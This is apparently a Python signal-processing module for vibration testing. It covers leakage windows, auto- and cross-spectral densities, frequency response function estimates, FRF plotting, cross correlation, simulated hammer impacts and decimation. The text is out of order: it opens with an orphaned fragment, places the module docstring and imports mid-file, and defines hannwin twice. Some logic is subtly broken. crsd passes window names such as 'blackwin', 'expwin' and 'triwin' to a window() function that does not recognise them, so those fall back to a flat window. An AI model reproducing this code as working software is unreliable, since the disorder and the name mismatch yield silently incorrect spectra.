    else:
        taps, _ = np.meshgrid(base, np.arange(x.shape[0]))
    return taps / la.norm(taps) * np.sqrt(npts)
def hannwin(*args, **kwargs):
    """Alternative for function `hanning`.

    All positional and keyword arguments are forwarded unchanged to
    :func:`hanning`; see that function for parameters and returns.
    """
    return hanning(*args, **kwargs)
def asd(x, t, windowname="none", ave=bool(True)):
    """Return autospectrum (power spectrum) density of a signal x.

    Parameters
    ----------
    x : float array
        Data array (n x N x m) where n is the number of sensors, N the
        number of samples, and m the number of experiments.
    t : float array
        Time array (1 x N)
    windowname : string
        Name of windowing function to use. See `window`.
    ave : bool, optional(True)
        Average result over the m experiments or not?

    Returns
    -------
    f : float array
        Frequency vector (1 x N)
    Pxx : float array
        Autospectrum (n x N) or (n x N x m) if not averaged.

    Notes
    -----
    The autospectrum is the cross spectrum of a signal with itself; its
    imaginary part is zero by construction, so only the real part is
    returned.

    .. seealso:: :func:`crsd`, :func:`frfest`.
    """
    freq_vec, auto_spectrum = crsd(x, x, t, windowname=windowname, ave=ave)
    return freq_vec, auto_spectrum.real
def crsd(x, y, t, windowname="none", ave=bool(True)):
    """Calculate the cross spectrum (power spectrum) density between two
    signals.

    Parameters
    ----------
    x, y : arrays
        Data arrays (n x N x m) where n is the number of sensors, N the
        number of samples, and m the number of experiments. 1-D arrays
        are promoted to shape (1, N, 1).
    t : array
        Time array (1 x N). A single-element array is interpreted as
        the sample time step itself.
    windowname : string
        Name of windowing function to use. See `window`.
    ave : bool, optional
        Average result over the m experiments or not?

    Returns
    -------
    f : array
        Frequency vector (1 x N)
    Pxy : array
        Cross spectrum (n x N) or (n x N x m) if not averaged.

    .. seealso:: :func:`asd`, :func:`frfest`.
    """
    t = t.flatten()
    if len(t) == 1:
        # Single value: already the time step.
        dt = t
    else:
        dt = t[2] - t[1]
    if dt <= 0:
        print('You sent in bad data. Delta t is negative. '
              'Please check your inputs.')
    if len(x.shape) == 1:
        x = np.expand_dims(x, axis=0)
        x = np.expand_dims(x, axis=2)
        y = np.expand_dims(y, axis=0)
        y = np.expand_dims(y, axis=2)
    n = x.shape[1]
    # Fix: previously tested `windowname.lower() is "none"`. `is` compares
    # identity, not equality, so the comparison could fail for an equal
    # string. Also tolerate windowname=None (previously AttributeError).
    if windowname is False or windowname is None \
            or str(windowname).lower() == "none":
        win = 1
    else:
        # Map public window names onto the names `window` accepts
        # (note: 'hammwin' historically maps to 'hamming').
        _names = {'hanning': 'hanning', 'blackwin': 'blackwin',
                  'boxwin': 'boxwin', 'expwin': 'expwin',
                  'hammwin': 'hamming', 'triwin': 'triwin',
                  'flatwin': 'flatwin'}
        wname = windowname.lower()
        win = window(x, windowname=_names[wname]) if wname in _names else 1
        y = y * win
        x = x * win
        del win
    ffty = np.fft.rfft(y, n, axis=1) * dt
    fftx = np.fft.rfft(x, n, axis=1) * dt
    # One-sided spectrum: factor 2 accounts for the discarded negative
    # frequencies.
    Pxy = np.conj(fftx) * ffty / (n * dt) * 2
    if len(Pxy.shape) == 3 and Pxy.shape[2] > 1 and ave:
        Pxy = np.mean(Pxy, 2)
    nfreq = 1 / dt / 2  # Nyquist frequency
    f = np.linspace(0, nfreq, Pxy.shape[1])  # /2./np.pi
    return f, Pxy
def frfest(x, f, dt, windowname="hanning", ave=bool(True), Hv=bool(False)):
    r"""Return freq, H1, H2, coh, Hv.

    Estimates the :math:`H(j\omega)` Frequency Response Functions (FRFs)
    between :math:`x` and :math:`f`.

    Parameters
    ----------
    x : float array
        output or response of system
    f : float array
        input to system
    dt : float
        time step of samples
    windowname : string
        One of: hanning, hamming, blackman, flatwin, boxwin
    ave : bool, optional(True)- currently locked
        whether or not to average PSDs and ASDs or calculate raw FRFs
    Hv : bool, optional(False)
        calculate the :math:`H_v` frequency response function

    Returns
    -------
    freq : float array
        frequency vector (1xN)
    H1 : float array
        Frequency Response Function :math:`H_1` estimate, (nxN) or (nxNxm)
    H2 : float array
        Frequency Response Function :math:`H_2` estimate, (nxN) or (nxNxm)
    coh : float array
        Coherance Function :math:`\gamma^2` estimate, (nxN)
    Hv : float array
        Frequency Response Function :math:`H_v` estimate, (nxN) or (nxNxm)

    Currently ``ave`` is locked to default values.

    Notes
    -----
    .. note:: Not compatible with scipy.signal functions
    .. seealso:: :func:`asd`, :func:`crsd`, :func:`frfplot`.
    .. warning:: hanning window cannot be selected yet. Averaging cannot
       be unselected yet.
    .. todo:: Fix averaging, windowing, multiple input.
    """
    # Coerce x and f to 3-D (channels x samples x records); for 2-D input
    # the longest axis is taken as the sample (time) axis.
    if len(f.shape) == 1:
        f = f.reshape(1, -1, 1)
    if len(x.shape) == 1:
        x = x.reshape(1, -1, 1)
    if len(f.shape) == 2:
        if (f.shape).index(max(f.shape)) == 0:
            f = f.reshape(max(f.shape), min(f.shape), 1)
        else:
            f = f.reshape(1, max(f.shape), min(f.shape))
    if len(x.shape) == 2:
        if (x.shape).index(max(x.shape)) == 0:
            x = x.reshape(max(x.shape), min(x.shape), 1)
        else:
            x = x.reshape(1, max(x.shape), min(x.shape))
    # Spectral densities. Pfx = conj(Pxf) is applied implicitly in the
    # H1 estimate below.
    Pff = asd(f, dt, windowname=windowname)[1]
    freq, Pxf = crsd(x, f, dt, windowname=windowname)
    _, Pxx = asd(x, dt)
    Txf1 = np.conj(Pxf / Pff)
    Txf2 = Pxx / Pxf
    # Nulled to avoid output problems/simplify calls if unrequested
    Txfv = np.zeros_like(Txf1)
    coh = (Pxf * np.conj(Pxf)).real / Pxx / Pff
    if Hv:
        # Hv estimate: eigenvector of the smallest eigenvalue of the 2x2
        # spectral matrix at each frequency line. (Fix: a dead first
        # assignment of `frfm`, immediately overwritten, was removed.)
        for i in range(Pxx.shape[1]):
            alpha = 1  # np.sqrt(Pff[0,i]/Pxx[0,i])
            frfm = np.array([[Pff[0, i], alpha * np.conj(Pxf[0, i])],
                             [alpha * Pxf[0, i], alpha**2 * Pxx[0, i]]])
            lam, vecs = la.eigh(frfm)
            index = lam.argsort()
            lam = lam[index]
            vecs = vecs[:, index]
            Txfv[0, i] = -(vecs[0, 0] / vecs[1, 0]) / alpha
    return freq, Txf1, Txf2, coh, Txfv
def frfplot(freq, H, freq_min=0, freq_max=None, type=1, legend=[]):
    """Frequency Response Function pretty plotting.

    Plots frequency response functions in a variety of formats.

    Parameters
    ----------
    freq : float array
        Frequency vector (rad/sec), (1xN)
    H : float array
        Frequency response functions (nxN)
    freq_min : float, optional
        Low frequency for plot (default 0)
    freq_max : float, optional
        High frequency for plot (default max frequency)
    legend : string array
        Array of string for use in legend. (Never mutated, so the
        mutable default is safe.)
    type : int, optional
        Plot type. Only type 1 (default: magnitude and phase versus F)
        is currently implemented. Types 2-15 — log-frequency, Bodelog,
        real/imaginary, Nyquist, and single-panel variants — are
        reserved and currently print a "not supported" message.

    Returns
    -------
    ax : axis objects or None
        Allows manipulation of plot parameters (xlabel, title...).
        None when the requested plot type is not supported.

    .. seealso:: `frfest`

    Copyright J. Slater, Dec 17, 1994
    Updated April 27, 1995
    Ported to Python, July 1, 2015
    """
    FLAG = type  # Plot type; 'type' kept in the signature for compatibility.
    freq = freq.reshape(1, -1)
    lenF = freq.shape[1]
    # Fix: was `len(H.shape) is 1` — identity comparison with an int
    # literal is implementation-dependent; use equality.
    if len(H.shape) == 1:
        H = H.reshape(1, -1)
    if H.shape[0] > H.shape[1]:
        H = H.T
    if freq_max is None:
        freq_max = np.max(freq)
    if freq_min is None:
        freq_min = np.min(freq)
    if freq_min < np.min(freq):
        freq_min = np.min(freq)
    if freq_min > freq_max:
        raise ValueError('freq_min must be less than freq_max.')
    # Indices bracketing the requested frequency span.
    inlow = int(lenF * (freq_min - np.amin(freq)
                        ) // (np.amax(freq) - np.amin(freq)))
    inhigh = int(lenF * (freq_max - np.amin(freq)
                         ) // (np.amax(freq) - np.amin(freq)) - 1)
    H = H[:, inlow:inhigh]
    freq = freq[:, inlow:inhigh]
    mag = 20 * np.log10(np.abs(H))
    minmag = np.min(mag)
    maxmag = np.max(mag)
    phase = np.unwrap(np.angle(H)) * 180 / np.pi
    # Round the phase limits out to multiples of 45 degrees.
    phmin = np.amin(phase) // 45 * 45.0
    phmax = (np.amax(phase) // 45 + 1) * 45
    ax = None  # fix: previously unbound (NameError) for unsupported types
    if FLAG == 1:  # fix: was `FLAG is 1`
        fig, (ax1, ax2) = plt.subplots(2, 1)
        ax1.plot(freq.T, mag.T)
        ax1.set_xlabel('Frequency (Hz)')
        ax1.set_ylabel('Mag (dB)')
        ax1.grid()
        # Fix: the xmin/xmax/ymin/ymax keywords were removed from
        # matplotlib; pass the limits positionally.
        ax1.set_xlim(freq_min, freq_max)
        ax1.set_ylim(minmag, maxmag)
        ax2.plot(freq.T, phase.T)
        ax2.set_xlabel('Frequency (Hz)')
        ax2.set_ylabel('Phase (deg)')
        ax2.grid()
        ax2.set_xlim(freq_min, freq_max)
        ax2.set_ylim(phmin, phmax)
        ax2.set_yticks(np.arange(phmin, (phmax + 45), 45))
        fig.tight_layout()
        if len(legend) > 0:
            plt.legend(legend)
        ax = (ax1, ax2)
    else:
        print("Sorry, that option isn't supported yet")
    return ax
"""# elif FLAG==2:
# subplot(2,1,1)
# semilogx(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# % Fmin,Fmax,min(mag),max(mag)
# axis([Fmin Fmax minmag maxmag])
# subplot(2,1,2)
# semilogx(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# elif FLAG==3:
# subplot(2,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F*2*pi,mag)
# xlabel('Frequency (Rad/s)')
# ylabel('Mag (dB)')
# grid on
# axis([Wmin Wmax minmag maxmag])
# zoom on
# subplot(2,1,2)
# semilogx(F*2*pi,phase)
# xlabel('Frequency (Rad/s)')
# ylabel('Phase (deg)')
# grid on
# axis([Wmin Wmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# elseif FLAG==4
# subplot(2,1,1)
# plot(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# subplot(2,1,2)
# plot(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==5
# subplot(1,1,1)
# imax=round(length(F)*Fmax/max(F));
# imin=round(length(F)*Fmin/max(F))+1;
# plot(real(Xfer(imin:imax)),imag(Xfer(imin:imax)))
# xlabel('Real')
# ylabel('Imaginary')
# grid on
# zoom on
# elseif FLAG==6
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# plot(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# elseif FLAG==7
# subplot(1,1,1)
# plot(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# elseif FLAG==8
# subplot(1,1,1)
# plot(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# elseif FLAG==9
# subplot(1,1,1)
# plot(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==10
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# elseif FLAG==11
# subplot(1,1,1)
# semilogx(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# elseif FLAG==12
# subplot(1,1,1)
# semilogx(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# elseif FLAG==13
# subplot(1,1,1)
# semilogx(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==14
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F*2*pi,mag)
# xlabel('Frequency (Rad/s)')
# ylabel('Mag (dB)')
# grid on
# axis([Wmin Wmax minmag maxmag])
# zoom on
# elseif FLAG==15
# subplot(1,1,1)
# semilogx(F*2*pi,phase)
# xlabel('Frequency (Rad/s)')
# ylabel('Phase (deg)')
# grid on
# axis([Wmin Wmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# else
# subplot(2,1,1)
# mag=20*log10(abs(Xfer));
# plot(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# subplot(2,1,2)
# plot(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
"""
def xcorr(t, x, y, zeropad=True):
    """Cross correlation of two 1-D signals computed via the FFT.

    Parameters
    ----------
    t : float array
        Time vector for the records (assumed uniformly spaced).
    x, y : float array
        Signals to correlate.
    zeropad : bool, optional(True)
        Zero-pad to twice the record length to avoid circular
        wrap-around.

    Returns
    -------
    tau : float array
        Lag vector (centered, in the units of `t`).
    xcor : float array
        Cross correlation of `x` and `y`.
    """
    npts = len(x) * 2 if zeropad is True else len(x)
    # Fix: the original mixed np.fft.rfft with scipy's removed sp.fft /
    # sp.ifft; in the zero-padded branch the two transforms even had
    # different lengths and could not be multiplied. Use matching full
    # FFTs throughout.
    Xn = np.fft.fft(x, n=npts)
    Yn = np.conj(np.fft.fft(y, n=npts))
    xcor = np.real(fftpack.fftshift(np.fft.ifft(Xn * Yn)))
    dt = t[1] - t[0]
    tau = np.linspace(-len(xcor) / 2 * dt - dt / 2,
                      len(xcor) / 2 * dt - dt / 2, len(xcor))
    return tau, xcor
def hammer_impulse(time, imp_time=None, imp_duration=None, doublehit=False,
                   dh_delta=None):
    """Generate simulated hammer hit (half sine).

    Parameters
    ----------
    time : float array
        1 x N time array. Suggest using `np.linspace(0,10,1000).reshape(1,-1)`
        for example
    imp_time : float (optional)
        Time of onset of impulse. Default is 0.1 time end time- which
        traditionally works well for impact testing
    imp_duration : float (optional)
        Duration of impulse. Default is 0.01 of total record
    doublehit : Boolean (optional)
        Allows repeat of hit to emulate a bad strike. Default is False
    dh_delta : float (optional)
        Time difference between primary strike and accidental second strike
        Default is 0.02 of record.

    Returns
    -------
    force : float array
        Half-sine pulse normalized to a unit impulse (unit time integral).
    """
    time_max = np.max(time)
    if imp_time is None:
        imp_time = 0.1 * time_max
    if imp_duration is None:
        imp_duration = 0.01 * time_max
    if dh_delta is None:
        dh_delta = 0.02
    dh_delta = dh_delta * time_max
    time = time.reshape(1, -1)
    imp_onset_index = int(time.shape[1] * imp_time / time_max)
    imp_offset_index = int((time.shape[1]) *
                           (imp_time + imp_duration) / time_max)
    imp_length = imp_offset_index - imp_onset_index
    # Half sine: one half period of a sine whose full period is twice
    # the impulse duration.
    T = imp_duration * 2
    omega = 2 * np.pi / T
    impulse = np.sin(omega * time[0, :imp_length])
    force = np.zeros_like(time)
    force[0, imp_onset_index:imp_onset_index + imp_length] = impulse
    if doublehit is True:
        doub_onset_index = int(time.shape[1]
                               * (imp_time + dh_delta) / time_max)
        force[0, doub_onset_index:doub_onset_index + imp_length] = impulse
    # Normalize to unit impulse. Fix: scipy.integrate renamed `simps` to
    # `simpson` and removed the old name in SciPy >= 1.14; support both.
    _simpson = getattr(spi, 'simpson', None) or getattr(spi, 'simps')
    force = force / _simpson(force.reshape(-1), dx=time[0, 1])
    return force
def decimate(t, in_signal, sample_frequency):
    r"""Decimate a signal to mimic sampling anti-aliased signal.

    The signal is low-pass filtered with an 8th-order Butterworth filter
    whose cutoff is 90% of the new Nyquist rate (i.e. 45% of
    `sample_frequency`), then down-sampled to `sample_frequency`.

    Parameters
    ----------
    t : float array
        time array, size (N,)
    in_signal : float array
        signal array, size (N,), (m,N), or (m,N,n)
    sample_frequency : float
        new sampling frequency

    Returns
    -------
    time : float array
    decimated_signal : float array

    Examples
    --------
    >>> time = np.linspace(0,4,4096)
    >>> u = np.random.randn(1,len(time))
    >>> ttime, signal_out = decimate(time, u, 100)
    """
    spacing = t[1] - t[0]
    current_frequency = 1 / spacing
    rate_ratio = sample_frequency / current_frequency
    # Anti-aliasing filter: cutoff as a fraction of the current Nyquist.
    numer, denom = signal.butter(8, .9 * rate_ratio, 'low')
    if in_signal.ndim > 1:
        smooth = signal.lfilter(numer, denom, in_signal, axis=1)
    else:
        smooth = signal.lfilter(numer, denom, in_signal)
    stride = int(1 / rate_ratio)
    time = t[::stride]
    # Down-sample along the time axis appropriate to the array rank.
    decimated_signal = smooth
    if in_signal.ndim == 1:
        decimated_signal = smooth[::stride]
    elif in_signal.ndim == 2:
        decimated_signal = smooth[:, ::stride]
    elif in_signal.ndim == 3:
        decimated_signal = smooth[:, ::stride, :]
    return time, decimated_signal
"""
Signal processing, creation and plotting.
Analysis of data and generation of simulated experiments.
"""
__license__ = "Joseph C. Slater"
__docformat__ = 'reStructuredText'
# import warnings
import numpy as np
import scipy as sp
import scipy.fftpack as fftpack
import scipy.linalg as la
import matplotlib.pyplot as plt
import scipy.integrate as spi
import scipy.signal as signal
"""
Notes:
------
Sept. 3, 2016
Development of windows in scipy.signal has been rapid and
determining what I should build into this module, or simply leverage
from scipy.signal has been a moving target.
It's now apparent that creating or returning a window is pointless. Further,
Applying should be a relatively simple code obviating much of any need for the
code here.
The cross spectrum analysis formerly lacking is now available, periodogram
is usually the best option, however not with impulse excitations. See
`scipy.signal` for this. Unfortunately, the conventions in this module are not
consistent with `scipy.signal`. They follow those of `python-control`
FRF calculation is typically trivial, Hv being an expected gap long term
MIMO FRF calculation is an open question. Pretty printing of FRFs is always
a welcome tool.
System ID is likely the remaining missing aspect at this time.
In order to be consistent with the Control Systems Library, increasing time
or increasing frequency steps positively with increased column number (one
dimension). Rows (0 dimension)
correspond to appropriate channels, output numbers, etc.
For cross spectrum data (cross spectrum density, frequency response function)
the 2 dimension represents the input channel.
The last dimension (2 or 3) indexes each data instance (experiment). That means
that an unaveraged cross spectrum density has dimension 4. If there is only a
single input channel, it is imperative to insist that the dimension exists,
even if it is only length 1. This is analogous to a vector being Nx1 versus
simply a 1-D array of length 1.
http://python-control.readthedocs.io/en/latest/conventions.html#time-series-data
Problem: This hasn't been fully implemented.
"""
def window(x, windowname='hanning', normalize=False):
    r"""Create leakage window.

    Create a window of length :math:`x`, or a window sized to match
    :math:`x` so that :math:`x\times w` is the windowed result.

    Parameters
    ----------
    x: integer, float array
        | If integer- number of points in desired window.
        | If array- array provides size of window returned.
    windowname: string
        One of: hanning, hamming, blackman, flatwin, boxwin
    normalize: bool, optional(False)
        Adjust power level (for use in ASD) to 1

    Returns
    -------
    w: float array
        | window array of size x
        | window array. Windowed array is then :math:`x\times w`
    """
    if isinstance(x, (list, tuple, np.ndarray)):
        # Build a window of dimension `n` by `N` (by `nr`) where `N` is
        # the number of samples, `n` the number of channels, and `nr`
        # the number of records.
        swap = 0
        if len(x.shape) == 1:
            if x.shape[0] == 1:
                print("x is a scalar... and shouldn't have entered this "
                      "part of the loop.")
            else:
                N = len(x)
                f = window(N, windowname=windowname)
        elif len(x.shape) == 3:
            if x.shape[0] > x.shape[1]:
                x = np.swapaxes(x, 0, 1)
                swap = 1
                print("You shouldn't do that.")
                print('The 1 dimension is the time (or frequency) '
                      'incrementing dimension.')
                print('Swapping axes temporarily to be compliant with '
                      "expectations. I'll fix them in your result")
            N = x.shape[1]
            f = window(N, windowname=windowname)
            f, _, _ = np.meshgrid(f, np.arange(x.shape[0]),
                                  np.arange(x.shape[2]))
            if swap == 1:
                f = np.swapaxes(f, 0, 1)
        elif len(x.shape) == 2:
            if x.shape[0] > x.shape[1]:
                x = np.swapaxes(x, 0, 1)
                swap = 1
                print("You shouldn't do that.")
                print('The 1 dimension is the time (or frequency) '
                      'incrementing dimension.')
                print('Swapping axes temporarily to be compliant with '
                      'expectations.')
                print("I'll reluctantly return a transposed result.")
            # Fix: N was not assigned on this branch, so normalize=True
            # raised NameError for 2-D input.
            N = x.shape[1]
            f = window(N, windowname=windowname)
            f, _ = np.meshgrid(f, np.arange(x.shape[0]))
            if swap == 1:
                f = np.swapaxes(f, 0, 1)
    else:
        N = x
        # Fix: the name tests used `is` (identity) instead of `==`
        # (equality); identity comparison of strings is unreliable.
        if windowname == 'hanning':
            f = np.sin(np.pi * np.arange(N) / (N - 1))**2 * np.sqrt(8 / 3)
        elif windowname == 'hamming':
            f = (0.54 - 0.46 * np.cos(2 * np.pi * (np.arange(N)) / (N - 1)))\
                * np.sqrt(5000 / 1987)
        elif windowname == 'blackman':
            print('blackman')
            f = (0.42 - 0.5 * np.cos(2 * np.pi * (np.arange(N) + .5) / (N))
                 + .08 * np.cos(4 * np.pi * (np.arange(N) + .5) / (N)))\
                * np.sqrt(5000 / 1523)
        elif windowname == 'flatwin':
            f = 1.0 - 1.933 * np.cos(2 * np.pi * (np.arange(N)) / (N - 1))\
                + 1.286 * np.cos(4 * np.pi * (np.arange(N)) / (N - 1))\
                - 0.338 * np.cos(6 * np.pi * (np.arange(N)) / (N - 1))\
                + 0.032 * np.cos(8 * np.pi * (np.arange(N)) / (N - 1))
        elif windowname == 'boxwin':
            f = np.ones((1, N))
        else:
            f = np.ones((1, N))
            print("I don't recognize window name ", windowname, ". Sorry.")
    if normalize is True:
        f = f / la.norm(f) * np.sqrt(N)
    return f
def hanning(x, normalize=False):
    r"""Return hanning window.

    Create a hanning window of length :math:`x`, or a hanning window
    sized to match :math:`x` so that :math:`x\times w` is the windowed
    result.

    Parameters
    ----------
    x: integer, float array
        | If integer- number of points in desired hanning windows.
        | If array- array provides size of window returned.
    normalize: bool, optional(False)
        Adjust power level (for use in ASD) to 1

    Returns
    -------
    w: float array
        | window array of size x
        | window array. Windowed array is then :math:`x\times w`
    """
    if isinstance(x, (list, tuple, np.ndarray)):
        # Build a Hanning window of dimension n by N (by nr): N samples,
        # n channels, nr records.
        swap = 0
        if len(x.shape) == 1:
            if x.shape[0] == 1:
                print("x is a scalar... and shouldn't have "
                      "entered this part of the loop.")
            else:
                N = len(x)
                f = hanning(N)
        elif len(x.shape) == 3:
            if x.shape[0] > x.shape[1]:
                x = np.swapaxes(x, 0, 1)
                swap = 1
                print('Swapping axes temporarily to be compliant with '
                      "expectations. I'll fix them in your result")
            # Fix: N was not assigned on this branch, so normalize=True
            # raised NameError for 3-D input.
            N = x.shape[1]
            f = hanning(N)
            f, _, _ = np.meshgrid(f, np.arange(x.shape[0]),
                                  np.arange(x.shape[2]))
            if swap == 1:
                f = np.swapaxes(f, 0, 1)
        elif len(x.shape) == 2:
            if x.shape[0] > x.shape[1]:
                x = np.swapaxes(x, 0, 1)
                swap = 1
                print('Swapping axes temporarily to be compliant with '
                      "expectations. I'll fix them in your result")
            # Fix: N was not assigned on this branch, so normalize=True
            # raised NameError for 2-D input.
            N = x.shape[1]
            f = hanning(N)
            f, _ = np.meshgrid(f, np.arange(x.shape[0]))
            if swap == 1:
                f = np.swapaxes(f, 0, 1)
    else:
        # Scalar: create a Hanning window of length x, scaled so the
        # window has unit power density before any normalization.
        N = x
        f = np.sin(np.pi * np.arange(N) / (N - 1))**2 * np.sqrt(8 / 3)
    if normalize is True:
        f = f / la.norm(f) * np.sqrt(N)
    return f
def blackwin(x):
    """Return the n point Blackman window.

    Returns x as the Blackman windowing array x_window; the windowed
    signal is then x*x_window.
    """
    print('blackwin is untested')
    if isinstance(x, (list, tuple, np.ndarray)):
        n = x.shape[1]
        f = blackwin(n)
        if len(x.shape) == 3:
            f, _, _ = np.meshgrid(f[0, :], np.arange(
                x.shape[0]), np.arange(x.shape[2]))
        else:
            f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
    else:
        n = x
        # Fix: the /n division belongs inside the cosine arguments,
        # cos(2*pi*(k+.5)/n), matching the 'blackman' case in window().
        # Previously it was applied to the cosine's result, producing a
        # non-Blackman, asymmetric array.
        f = np.reshape((0.42
                        - 0.5 * np.cos(2 * np.pi * (np.arange(n) + .5) / n)
                        + .08 * np.cos(4 * np.pi * (np.arange(n) + .5) / n))
                       * np.sqrt(5000 / 1523), (1, -1))
    f = f / la.norm(f) * np.sqrt(n)
    return f
def expwin(x, ts=.75):
    """Return the n point exponential window.

    Returns x as the expwin windowing array x_windowed.
    The windowed signal is then x*x_window.

    Parameters
    ----------
    x : int or float array
        Window length, or the signal array (m x N or m x N x r) to
        build a matching window for.
    ts : float, optional
        Sets the 5% "settling time" of the window as a fraction of the
        record. Default is ts=0.75.

    Returns
    -------
    f : float array
        Exponential windowing array, scaled so ``la.norm(f) == sqrt(n)``.
    """
    print('expwin is untested')
    tc = -ts / np.log(.05)  # decay constant reaching 5% amplitude at ts
    if isinstance(x, (list, tuple, np.ndarray)):
        n = x.shape[1]
        # Propagate ts: the original recursive call used the default,
        # silently ignoring a user-supplied settling time for array input.
        f = expwin(n, ts=ts)
        if len(x.shape) == 3:
            f, _, _ = np.meshgrid(f[0, :], np.arange(
                x.shape[0]), np.arange(x.shape[2]))
        else:
            f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
    else:
        n = x
        # Sample positions at bin centers, expressed over the record.
        v = (n - 1) / n * np.arange(n) + (n - 1) / n / 2
        f = np.exp(-v / tc / (n - 1))
        # Normalize once to norm sqrt(n); the original normalized twice,
        # the second pass being a numerical no-op.
        f = np.reshape(f / la.norm(f) * np.sqrt(n), (1, -1))
    return f
def hammwin(x):
    """Return the n point Hamming window.

    When ``x`` is an integer, the (1, n) window itself is returned;
    when ``x`` is an array, a windowing array of matching shape is
    returned, so the windowed signal is ``x * x_window``.
    """
    print('hammwin is untested')
    if isinstance(x, (list, tuple, np.ndarray)):
        # Tile the 1-D window across every channel (and record) of x.
        num_points = x.shape[1]
        base = hammwin(num_points)
        if len(x.shape) == 3:
            f, _, _ = np.meshgrid(base[0, :],
                                  np.arange(x.shape[0]),
                                  np.arange(x.shape[2]))
        else:
            f, _ = np.meshgrid(base[0, :], np.arange(x.shape[0]))
    else:
        num_points = x
        samples = np.arange(num_points)
        raised_cosine = 0.54 - 0.46 * np.cos(2 * np.pi * samples /
                                             (num_points - 1))
        f = np.reshape(raised_cosine * np.sqrt(5000 / 1987), (1, -1))
        # Scale so the window carries unit RMS (norm == sqrt(n)).
        f = f / la.norm(f) * np.sqrt(num_points)
    return f
def flatwin(x):
    """Return the n point flat top window.

    x_windows = flatwin(x)

    When ``x`` is an integer, the (1, n) window itself is returned;
    when ``x`` is an array, a windowing array of matching shape is
    returned, so the windowed signal is ``x * x_window``.

    McConnell, K. G., "Vibration Testing: Theory and Practice,"
    Wiley, 1995.
    """
    print('flatwin is untested')
    if isinstance(x, (list, tuple, np.ndarray)):
        # Tile the 1-D window across every channel (and record) of x.
        num_points = x.shape[1]
        base = flatwin(num_points)
        if len(x.shape) == 3:
            f, _, _ = np.meshgrid(base[0, :],
                                  np.arange(x.shape[0]),
                                  np.arange(x.shape[2]))
        else:
            f, _ = np.meshgrid(base[0, :], np.arange(x.shape[0]))
    else:
        num_points = x
        theta = np.pi * np.arange(num_points) / (num_points - 1)
        # Flat-top window: a sum of four cosine harmonics.
        f = (1.0
             - 1.933 * np.cos(2 * theta)
             + 1.286 * np.cos(4 * theta)
             - 0.338 * np.cos(6 * theta)
             + 0.032 * np.cos(8 * theta)).reshape(1, -1)
        # Scale so the window carries unit RMS (norm == sqrt(n)).
        f = f / la.norm(f) * np.sqrt(num_points)
    return f
def boxwin(x):
    """Return the n point box window (uniform).

    When ``x`` is an integer, the (1, n) window itself is returned;
    when ``x`` is an array, a windowing array of matching shape is
    returned, so the windowed signal is ``x * x_window``.
    """
    print('boxwin is untested')
    if isinstance(x, (list, tuple, np.ndarray)):
        # Tile the 1-D window across every channel (and record) of x.
        num_points = x.shape[1]
        base = boxwin(num_points)
        if len(x.shape) == 3:
            f, _, _ = np.meshgrid(base[0, :],
                                  np.arange(x.shape[0]),
                                  np.arange(x.shape[2]))
        else:
            f, _ = np.meshgrid(base[0, :], np.arange(x.shape[0]))
    else:
        num_points = x
        f = np.ones((1, num_points))
        # Normalizing an all-ones row to norm sqrt(n) leaves it all ones;
        # kept for symmetry with the other window builders.
        f = f / la.norm(f) * np.sqrt(num_points)
    return f
def hannwin(*args, **kwargs):
    """Alternative for function `hanning`.

    Forwards all positional and keyword arguments unchanged to
    :func:`hanning` and returns its result.
    """
    return hanning(*args, **kwargs)
